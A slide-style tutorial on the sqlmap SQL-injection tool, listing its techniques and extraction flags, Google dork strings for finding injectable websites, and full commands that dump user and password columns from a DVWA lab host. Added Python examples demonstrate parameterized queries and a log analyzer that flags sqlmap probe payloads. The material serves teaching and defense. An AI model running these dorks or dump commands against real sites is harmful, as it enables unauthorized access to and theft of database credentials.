sqlmap
• It is an open source tool for using SQL injection in a better and simpler way.
• sqlmap is developed in Python.
• sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
• It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches, ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
sqlmap developed by
• Bernardo Damele A. G. (@inquisb), https://twitter.com/inquisb
• Miroslav Stampar (@stamparm), https://twitter.com/stamparm
Features of sqlmap
• It supports various database management systems:
  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • IBM DB2
  • SQLite
  • Firebird
  • Sybase
  • SAP MaxDB
  • HSQLDB
  • Informix
Features of sqlmap
• SQL injection techniques:
  1. boolean-based blind
     Data is inferred character by character, based on changes in the page.
  2. time-based blind
     Data is inferred character by character, based on response time.
  3. error-based
     Uses the errors that are displayed to extract data.
  4. UNION query
     Changes the SQL query to extract data.
  5. stacked queries
     Semicolons are used to inject multiple statements into the SQL query.
  6. out-of-band
     The injection is made through the web application, and a secondary channel such as DNS queries is used to dump the data back to the attacker's domain.
• Enumerates users, password hashes, privileges, roles, databases, tables and columns.
• Cracks passwords using a dictionary-based attack.
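Why the boolean-based blind technique works, and what removes the signal it depends on, shown as an added example that is not part of the original slides. The in-memory SQLite table, the function names and the sample rows are assumptions made for illustration.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for a "users" table; all values are placeholders.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "<hash-placeholder>"), (2, "alice", "<hash-placeholder>")],
    )
    return db


def lookup_concatenated(db, raw_id):
    """'Before' form: the request parameter becomes part of the SQL text."""
    query = "SELECT user FROM users WHERE user_id = " + raw_id
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        # Errors are hidden from the client, as on a "blind" page.
        return "missing"
    return "exists" if row else "missing"


def lookup_bound(db, raw_id):
    """Hardened form: validate the type, then bind the value as data."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return "missing"
    row = db.execute(
        "SELECT user FROM users WHERE user_id = ?", (int(raw_id),)
    ).fetchone()
    return "exists" if row else "missing"


def leaks_boolean_signal(lookup, db):
    """True when the response differs between an always-true and an
    always-false condition appended to the id. That difference in the
    page is what boolean-based blind inference reads, one bit at a time."""
    return lookup(db, "1 AND 1=1") != lookup(db, "1 AND 1=2")


if __name__ == "__main__":
    db = make_db()
    for handler in (lookup_concatenated, lookup_bound):
        print(handler.__name__, "leaks signal:", leaks_boolean_signal(handler, db))
```

The same check can be kept as a regression test for any handler that takes an identifier from the request.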
Features of sqlmap
• Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
• Support to dump database tables entirely.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
Detection
These options can be used to customize the detection phase:
• --level=LEVEL       Level of tests to perform (1-5, default 1)
• --risk=RISK         Risk of tests to perform (1-3, default 1)
• --string=STRING     String to match when query is evaluated to True
• --not-string=NOT..  String to match when query is evaluated to False
• --regexp=REGEXP     Regexp to match when query is evaluated to True
• --code=CODE         HTTP code to match when query is evaluated to True
• --text-only         Compare pages based only on the textual content
• --titles            Compare pages based only on their titles
Extracting Information With Sqlmap
• Recover the session user: --current-user
• Detect the current database: --current-db
• Find out if the session user is a database administrator: --is-dba
• List database system users: --users
• List databases: --dbs
• DBMS server hostname: --hostname
• DBMS exact version, OS information, architecture and patch level: -f
Extracting Information With Sqlmap
• List the DBMS users: --users
• List all DBMS users' password hashes: --passwords
• List users' privileges: --privileges
• List all columns, or just those of a specific table from a database: --columns (-T <table name> -D <database>)
• Execute a custom SQL query: --sql-query="<sql query to execute>"
• SQL shell to execute all your custom SQL queries: --sql-shell
Extracting Information With Sqlmap
• DBMS database to enumerate: -D (Database_name)
• DBMS database table(s) to enumerate: -T (table_name)
• DBMS database table column(s) to enumerate: -C (columns_name)
• Dump DBMS database table entries: --dump
• Dump all DBMS databases' table entries: --dump-all
• Enumerate DBMS database tables: --tables
• Enumerate DBMS users' roles: --roles
Extracting Information With Sqlmap
• Retrieve DBMS banner: -b, --banner
• Enumerate DBMS schema: --schema
• Retrieve DBMS comments: --comments
Sqlmap: workflow
• Find a vulnerable website
  • Google dork strings to find SQL-injectable websites:
    • inurl:product-item.php?id=
    • inurl:news.php?catid=
    • inurl:index.php?id=
    • inurl:title.php?id=
• Identify possible injection points
• Identify SQLi vulnerabilities:
  • By using sqlmap
  • Manual testing
• Exploit SQLi vulnerabilities
Requirement
• Kali Linux
• Metasploitable 2 (testing)

List DBMS databases using sqlmap SQL injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" --dbs

List tables of the target database using sqlmap SQL injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa --tables

List columns of the target table of the selected database using sqlmap SQL injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa -T users --columns

List users and passwords from the target columns of the target table of the selected database using sqlmap SQL injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa -T users -C user,user_id,password --dump
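What a lab run like the one above looks like from the web server's side, as an added detection example that is not part of the original slides. The log lines, source addresses, tag names and threshold are constructed for illustration; the only tool-specific fact used is that sqlmap's default User-Agent starts with "sqlmap/", which is a weak signal on its own because a client can send any User-Agent.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in combined log format (sample data only).
SAMPLE_LOG = """\
172.25.25.50 - - [10/Apr/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
172.25.25.50 - - [10/Apr/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
172.25.25.77 - - [10/Apr/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.7 (https://sqlmap.org)"
172.25.25.77 - - [10/Apr/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%204821%3D4821&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.7 (https://sqlmap.org)"
172.25.25.77 - - [10/Apr/2024:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%204821%3D9113&Submit=Submit HTTP/1.1" 404 4410 "-" "sqlmap/1.7 (https://sqlmap.org)"
172.25.25.77 - - [10/Apr/2024:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.7 (https://sqlmap.org)"
172.25.25.88 - - [10/Apr/2024:10:02:30 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20UNION%20SELECT%20NULL%2CNULL&Submit=Submit HTTP/1.1" 200 4600 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# SQL syntax that has no business inside a numeric "id" parameter.
SQL_SYNTAX_RE = re.compile(
    r"(?i)\bunion\b.+\bselect\b"
    r"|\b(?:sleep|benchmark|pg_sleep)\s*\("
    r"|\bwaitfor\s+delay\b"
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+"
    r"|information_schema"
)


def analyze(log_text, distinct_threshold=3):
    """Return {source_ip: sorted list of tags} for suspicious clients."""
    findings = defaultdict(set)
    seen_values = defaultdict(set)  # (ip, path, parameter) -> distinct values
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        ip = match["ip"]
        if "sqlmap/" in match["ua"].lower():
            findings[ip].add("tool-user-agent")
        target = urlsplit(match["target"])
        # parse_qsl percent-decodes values, so encoded payloads are matched too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            seen_values[(ip, target.path, name)].add(value)
            if SQL_SYNTAX_RE.search(value):
                findings[ip].add("sql-syntax-in-parameter")
    # Many distinct values for one parameter from one client suggests probing.
    for (ip, _path, _name), values in seen_values.items():
        if len(values) >= distinct_threshold:
            findings[ip].add("parameter-fuzzing")
    return {ip: sorted(tags) for ip, tags in findings.items()}


if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```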